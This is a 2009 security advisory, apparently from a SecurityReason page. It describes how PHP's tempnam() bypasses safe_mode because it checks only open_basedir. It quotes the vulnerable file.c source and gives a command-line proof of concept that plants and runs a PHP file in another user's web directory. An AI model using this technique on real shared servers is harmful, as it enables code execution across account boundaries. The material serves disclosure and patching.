PHP 5.2.11 tempnam() safe_mode bypass

Advisory Content :

[ PHP 5.2.11/5.3.0 (file.c) Safe-mode bypass ]

Author: Grzegorz Stachowiak

Date:
- - Dis.: 23.09.2009
- - Pub.: 29.09.2009

Risk: Medium

Affected Software:
- - PHP 5.2.11 and prior

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed
from C, Java and Perl with a couple of unique PHP-specific features thrown
in. The goal of the language is to allow web developers to write
dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.tempnam.php

- --- 1. PHP 5.2.11/5.3.0 (file.c) Safe-mode bypass ---

The main problem exist in function tempnam() which check only open_basedir
value. We can create any file with PHP code, in any writable folder.

- ---ext/standard/file.c---

PHP_FUNCTION(tempnam)
{
char *dir, *prefix;
int dir_len, prefix_len;
size_t p_len;
char *opened_path;
char *p;
int fd;

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &dir, &dir_len,
&prefix, &prefix_len) == FAILURE) {
return;
}

if (php_check_open_basedir(dir TSRMLS_CC)) { [1]
RETURN_FALSE;
}

php_basename(prefix, prefix_len, NULL, 0, &p, &p_len TSRMLS_CC);
if (p_len > 64) {
p[63] = '\0';
}

if ((fd = php_open_temporary_fd(dir, p, &opened_path TSRMLS_CC)) >= 0) {
close(fd);
RETVAL_STRING(opened_path, 0);
}
efree(p);
}

- ---ext/standard/file.c---

[1]. Function tempnam() check only open_basedir value.

- ---example0 (5.2.11/5.3.0)---

x@x-desktop:/var/www/bypass# php -v

PHP 5.3.0 (cli) (built: Sep 22 2009 14:06:39)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2009 Zend Technologies

|----------------------------------------------------------------|

x@x-desktop:/var/www/bypass# php -r "echo ini_get('safe_mode')"

1

|----------------------------------------------------------------|

y@x-desktop:~/www$ ls -la
total 8
drwxrwxrwx 2 y y 4096 2009-09-27 19:11 .
drwxr-xr-x 9 y y 4096 2009-09-27 19:11 ..

x@x-desktop:/var/www/bypass$ id
uid=1000(x) gid=1000(x)

|----------------------------------------------------------------|

x@x-desktop:/var/www/bypass$ php -r
"fopen('/home/y/www/safe_mode_bypass.php','a+');"
1
Warning: fopen(): SAFE MODE Restriction in effect. The script whose uid is
1000 is not allowed to access /home/y/www/ owned by uid 1001 in Command
line code on line 1

Warning: fopen(/home/y/www/safe_mode_bypass.php): failed to open stream: No
such file or directory in Command line code on line 1

|----------------------------------------------------------------|

x@x-desktop:/var/www/bypass$ php -r
"tempnam('/home/y/www/','safe_mode_bypass.php.');"

x@x-desktop:/var/www/bypass$ ls -la /home/y/www/
total 8
drwxrwxrwx 2 y y 4096 2009-09-27 19:15 .
drwxr-xr-x 9 y y 4096 2009-09-27 19:11 ..
-rw------- 1 x x 0 2009-09-27 19:15 safe_mode_bypass.php.SUT2N3

|----------------------------------------------------------------|

x@x-desktop:/var/www/bypass$ php -r
"file_put_contents('/home/y/www/safe_mode_bypass.php.SUT2Nb','<?php echo
getcwd(); ?>');"

x@x-desktop:/var/www/bypass$ cat /home/y/www/safe_mode_bypass.php.SUT2Nb

<?php echo getcwd(); ?>

|----------------------------------------------------------------|

x@x-desktop:/var/www/bypass$ php -r
"chmod('/home/y/www/safe_mode_bypass.php.SUT2Nb',0755);"

x@x-desktop:/var/www$ curl http://localhost/safe_mode_bypass.php.SUT2Nb

/home/y/www

|----------------------------------------------------------------|

File has been executed as PHP file, because extension .SUT2Nb do not exist,
so Apache "search" other extension in filename, in this instance .php .

- --- 3. Contact ---

Author: Grzegorz Stachowiak
Email: stachowiak {a|t} analogicode.pl

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

PHP 5.2.11 tempnam() safe_mode bypass